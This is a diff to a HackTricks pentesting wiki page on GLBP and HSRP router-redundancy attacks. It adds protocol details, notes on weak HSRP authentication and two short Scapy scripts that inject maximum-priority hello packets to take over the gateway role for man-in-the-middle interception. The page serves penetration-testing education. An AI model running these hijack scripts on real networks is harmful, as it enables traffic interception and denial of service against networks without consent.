Merge pull request #1865 from HackTricks-wiki/research_update_src_generic-methodologies-and-resources_pentesting-network_glbp-and-hsrp-attacks_20260206_023647

Research Update Enhanced src/generic-methodologies-and-resou...

Author: carlospolop

src/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md

@@ -13,6 +13,8 @@ FHRP is designed to provide network robustness by merging multiple routers into
 
 Cisco's creation, GLBP, functions on the TCP/IP stack, utilizing UDP on port 3222 for communication. Routers in a GLBP group exchange "hello" packets at 3-second intervals. If a router fails to send these packets for 10 seconds, it is presumed to be offline. However, these timers are not fixed and can be modified.
 
+GLBP for IPv6 uses multicast **FF02::66** over UDP/3222, and the virtual MAC format becomes `0007.b4xx.xxyy` (AVF ID is in the last byte). Timing and attack surface remain the same as in IPv4, so hijack techniques still work in dual‑stack networks.
+
 ### GLBP Operations and Load Distribution
 
 GLBP stands out by enabling load distribution across routers using a single virtual IP coupled with multiple virtual MAC addresses. In a GLBP group, every router is involved in packet forwarding. Unlike HSRP/VRRP, GLBP offers genuine load balancing through several mechanisms:
@@ -35,6 +37,20 @@ For interactions, GLBP employs the reserved multicast address 224.0.0.102 and UD
 
 An attacker can become the primary router by sending a GLBP packet with the highest priority value (255). This can lead to DoS or MITM attacks, allowing traffic interception or redirection.
 
+**Practical GLBP hijack with Scapy (short PoC)**
+
+```python
+from scapy.all import *
+
+vip = "10.10.100.254"          # learned from sniffing
+pkt = IP(dst="224.0.0.102")/UDP(dport=3222,sport=3222)/Raw(
+    b"\x01\x00\xff\x64"      # Version=1, Opcode=Hello, Priority=255, Weight=100
+)
+send(pkt, iface="eth0", loop=1, inter=1)
+```
+
+Craft the payload bytes to mimic the GLBP header (version/opcode/priority/weight/VRID). Looping the frame ensures you win the AVG election if authentication is absent.
+
 ### Executing a GLBP Attack with Loki
 
 [Loki](https://github.com/raizo62/loki_on_kali) can perform a GLBP attack by injecting a packet with priority and weight set to 255. Pre-attack steps involve gathering information like the virtual IP address, authentication presence, and router priority values using tools like Wireshark.
@@ -75,6 +91,8 @@ Monitoring and intercepting traffic can be done using net-creds.py or similar to
 
 HSRP is a Cisco proprietary protocol designed for network gateway redundancy. It allows the configuration of multiple physical routers into a single logical unit with a shared IP address. This logical unit is managed by a primary router responsible for directing traffic. Unlike GLBP, which uses metrics like priority and weight for load balancing, HSRP relies on a single active router for traffic management.
 
+HSRPv1 uses multicast **224.0.0.2** and virtual MAC `0000.0c07.acXX`; HSRPv2 and HSRPv2 for IPv6 use **224.0.0.102 / FF02::66** and virtual MAC `0000.0c9f.fXXX`. UDP destination port is **1985** for IPv4 and **2029** for IPv6.
+
 #### Roles and Terminology in HSRP
 
 - **HSRP Active Router**: The device acting as the gateway, managing traffic flow.
@@ -91,6 +109,26 @@ HSRP comes in two versions, HSRPv1 and HSRPv2, differing mainly in group capacit
 
 HSRP attacks involve forcibly taking over the Active Router's role by injecting a maximum priority value. This can lead to a Man-In-The-Middle (MITM) attack. Essential pre-attack steps include gathering data about the HSRP setup, which can be done using Wireshark for traffic analysis.
 
+**Quick HSRP takeover with Scapy**
+
+```python
+from scapy.all import *
+
+vip = "10.10.100.1"
+pkt = IP(dst="224.0.0.102")/UDP(sport=1985,dport=1985)/Raw(
+    b"\x00\x02\xff\x03\x00\x00\x00\x01"  # Hello, priority 255, group 1
+)
+send(pkt, iface="eth0", inter=1, loop=1)
+```
+
+If authentication is **not** configured, continuously sending hellos with higher priority forces peers into *Speak*/*Listen* states and lets you become *Active*, redirecting traffic through your host.
+
+**HSRP authentication corner cases**
+
+- Legacy plain-text auth is trivially spoofable.
+- MD5 authentication only covers the HSRP payload; crafted packets can still rate-limit/DoS control planes. NX-OS releases previously allowed DoS against authenticated groups (see Cisco advisory CSCup11309).
+- On many ISP / VPS shared VLANs, HSRPv1 multicasts are visible to tenants; without auth you can join and preempt traffic.
+
 #### Steps for Bypassing HSRP Authentication
 
 1. Save the network traffic containing HSRP data as a .pcap file.
@@ -135,9 +173,6 @@ Executing these steps places the attacker in a position to intercept and manipul
 ## References
 
 - [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
-
-
+- [Cisco NX-OS HSRP authentication DoS (CSCup11309)](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/Cisco-SA-20140611-CVE-2014-3295)
+- [Reddit: HSRP seen on VPS shared VLANs](https://www.reddit.com/r/networking/comments/1h0v1aq/hsrp_seen_on_cloud_vlans_without_auth/)
 {{#include ../../banners/hacktricks-training.md}}
-
-
-